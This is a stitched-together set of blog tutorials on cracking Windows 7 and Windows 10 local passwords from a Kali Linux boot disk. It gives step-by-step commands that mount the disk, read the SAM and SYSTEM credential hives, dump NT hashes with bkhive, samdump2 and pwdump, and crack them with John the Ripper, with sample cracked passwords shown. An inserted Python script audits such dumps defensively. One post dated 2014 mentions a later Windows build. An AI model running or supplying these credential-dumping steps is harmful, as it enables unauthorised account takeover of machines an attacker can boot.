Crack Windows 7 passwords using Kali Linux
In this tutorial, we will use 'bkhive', 'samdump2', and 'John the Ripper' in Kali Linux to crack Windows 7
passwords.
For this tutorial, you need:
a) Kali Linux LiveDVD
b) A Windows 7 machine
Perform the following steps:
1) Boot the machine using Kali Linux LiveDVD
2) Open the terminal window, and view the list of partitions on disk
root@kali:~# lsblk
3) Mount the Windows partition
root@kali:~# mount /dev/sda2 /mnt
4) Traverse to the SAM database directory.
root@kali:~# cd /mnt/Windows/System32/config
5) View 'SYSTEM' file in 'config' directory.
root@kali:/mnt/Windows/System32/config# ls
6) Dump the syskey bootkey from Windows System Hive
root@kali:/mnt/Windows/System32/config# bkhive SYSTEM hive.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author:
[email protected]
Root Key : CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: 001
Bootkey: 9055be7eb881423834eda4a7427acbe0
7) Dump the Windows password hashes.
root@kali:/mnt/Windows/System32/config# samdump2 SAM hive.txt > hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author:
[email protected]
Root Key : CMI-CreateHive{899121E8-11D8-44B6-ACEB-301713D5ED8C}
8) View the hash file
root@kali:/mnt/Windows/System32/config# cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
shabbir:1000:aad3b435b51404eeaad3b435b51404ee:638fc14bdf05a6445d5a1e5c1f81fe5d:::
Batul:1004:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
Ali:1005:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
9) Crack password hashes using John the Ripper
root@kali:/mnt/Windows/System32/config# john --format=nt2 hash.txt
Created directory: /root/.john
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 intrinsics 12x])
shabbir (shabbir)
admin (Ali)
(Administrator)
(Guest)
welcome (Batul)
guesses: 5 time: 0:00:00:00 DONE (Thu May 7 00:05:01 2015) c/s: 59142 trying: please - zephyr
https://linux-hacking-guide.blogspot.com/2015/05/crack-windows-7-passwords-using-kali.html
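As an added example (not part of the original tutorial), this Python script reads a dump in the hash.txt format from step 8 and reports what a defender reviewing it would flag: blank passwords, stored LM hashes, and accounts that share a password. The svc_backup line and its LM value are constructed for illustration; the two constants are the well-known LM and NT hashes of an empty password.

```python
# Added example (not from the original tutorial): audit a samdump2/pwdump dump.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string (no LM stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
HEX = set("0123456789abcdef")

# Constructed sample: the hash.txt from step 8 plus one hypothetical account
# (svc_backup, made-up LM value) to exercise the LM and reuse checks.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
shabbir:1000:aad3b435b51404eeaad3b435b51404ee:638fc14bdf05a6445d5a1e5c1f81fe5d:::
Batul:1004:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
Ali:1005:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
svc_backup:1006:0123456789abcdef0123456789abcdef:638fc14bdf05a6445d5a1e5c1f81fe5d:::
"""

def is_hash(s):
    """True for a 32-character lowercase hex string."""
    return len(s) == 32 and set(s) <= HEX

def parse_line(line):
    """Parse 'user:rid:lm:nt:::'; return None for malformed lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit() or not is_hash(parts[3].lower()):
        return None
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}

def audit(text):
    """Return (account, finding) tuples for a dump in the format above."""
    findings, by_nt = [], defaultdict(list)
    for rec in filter(None, map(parse_line, text.splitlines())):
        if rec["nt"] == EMPTY_NT:
            # The format has no enabled/disabled flag; check account state separately.
            findings.append((rec["user"], "blank password"))
        else:
            by_nt[rec["nt"]].append(rec["user"])
        if is_hash(rec["lm"]) and rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored"))
    for users in by_nt.values():  # NT hashes are unsalted: same hash, same password
        if len(users) > 1:
            findings.append((", ".join(sorted(users)), "shared password"))
    return findings

if __name__ == "__main__":
    for who, issue in audit(SAMPLE):
        print(f"{who}: {issue}")
```

On the five lines the tutorial itself shows, the only findings are the blank NT hashes for Administrator and Guest, which is why John reports empty passwords for those two accounts in step 9.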
Using John the Ripper to Crack Passwords
Posted by admin on October 4, 2014
Posted in: Linux OS, Security.
It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and
samdump2.
To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive,
locate the directory containing the SAM file, dump the password hashes to a file, and then crack with
John the Ripper.
Boot the target Windows computer from your KALI Linux 2.0 system. From time to time when you
try to access the hard drive containing the Windows partition you may receive an error message
related to the Windows hibernation file. To avoid this, shut down Windows at the command prompt
with the command:
shutdown /s /t 0
This should prevent the hibernation file problem. Once you are in KALI, open up FILES and select
your Windows hard drive to mount it. Open a terminal window and enter the command
mount
to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be
the last mount point in the list, normally something like /dev/sda1. Your path will be something
like /media/root/OSDisk. Browse to the Windows/System32/config folder under your mount point. Use the
following command to create a dump of the Windows passwords:
pwdump SYSTEM SAM > /root/Desktop/SAM2
Then use John the Ripper to break the passwords.
john /root/Desktop/SAM2 --format=NT
For Kali Linux prior to version 2.0
Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point
bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
john /root/hash.txt --format=nt2
https://sinjinsmith.net/?p=46
https://www.computersecuritystudent.com/HOME/index.html